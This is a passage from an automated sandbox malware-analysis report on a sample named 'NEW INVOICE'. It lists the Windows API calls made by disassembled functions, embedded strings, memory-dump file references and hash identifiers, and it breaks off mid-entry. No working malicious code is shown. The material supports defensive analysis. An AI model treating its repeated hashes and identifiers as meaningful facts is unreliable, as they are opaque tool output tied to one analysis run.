                                                                                    • _memset.LIBCMT ref: 00455127
                                                                                    • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                    • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                    • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                    • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                    • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                                    • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                    • DrawMenuBar.USER32 ref: 00455207
                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1663942905-4108050209
                                                                                    • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                    • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                    • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                    • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 1481289235-0
                                                                                    • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                    • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                                    • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                    • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                                    APIs
                                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                    • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                    • SendMessageW.USER32 ref: 0046FBAF
                                                                                    • SendMessageW.USER32 ref: 0046FBE2
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                    • SendMessageW.USER32 ref: 0046FD00
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                    • String ID:
                                                                                    • API String ID: 2632138820-0
                                                                                    • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                    • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                    • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                    • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                    APIs
                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                    • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CursorLoad
                                                                                    • String ID:
                                                                                    • API String ID: 3238433803-0
                                                                                    • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                    • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                                    • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                    • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                    • _wcslen.LIBCMT ref: 00460B00
                                                                                    • __swprintf.LIBCMT ref: 00460B9E
                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                                    • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                                    • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                                    • GetParent.USER32(?), ref: 00460D40
                                                                                    • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                    • String ID: %s%u
                                                                                    • API String ID: 1899580136-679674701
                                                                                    • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                    • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                                    • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                    • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                                    APIs
                                                                                    • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                    • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                    • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                                    • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                                    • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                    • API String ID: 2485709727-934586222
                                                                                    • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                    • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                                    • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                    • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                    • String ID: HH
                                                                                    • API String ID: 3381189665-2761332787
                                                                                    • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                    • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                    • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                    • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 00434585
                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                    • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                    • String ID: (
                                                                                    • API String ID: 3300687185-3887548279
                                                                                    • Opcode ID: a49f41e91dac5baa2c50b775dc8de30f0d01d64d4146e99f951c4697ae3d27a6
                                                                                    • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                    • Opcode Fuzzy Hash: a49f41e91dac5baa2c50b775dc8de30f0d01d64d4146e99f951c4697ae3d27a6
                                                                                    • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                                    APIs
                                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                    • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                    • __swprintf.LIBCMT ref: 0045E4D9
                                                                                    • _printf.LIBCMT ref: 0045E595
                                                                                    • _printf.LIBCMT ref: 0045E5B7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString_printf$__swprintf_wcslen
                                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                    • API String ID: 3590180749-2894483878
                                                                                    • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                    • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                    • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                    • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                                    • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                                    • DeleteObject.GDI32(?), ref: 0046F950
                                                                                    • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                                    • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                                    • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                                    • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                                    • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                                    • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                                    • DeleteObject.GDI32(?), ref: 0046FA68
                                                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3412594756-0
                                                                                    • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                    • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                    • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                    • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                    APIs
                                                                                      • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                      • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                    • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                    • API String ID: 4013263488-4113822522
                                                                                    • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                    • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                    • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                    • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                                    • String ID:
                                                                                    • API String ID: 228034949-0
                                                                                    • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                    • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                                    • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                    • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                    • DeleteObject.GDI32(?), ref: 00433603
                                                                                    • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 3969911579-0
                                                                                    • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                    • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                    • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                    • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                    APIs
                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045EF6C
                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045EF81
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045EF94
                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045EFAB
                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045EFB8
                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045EFD2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
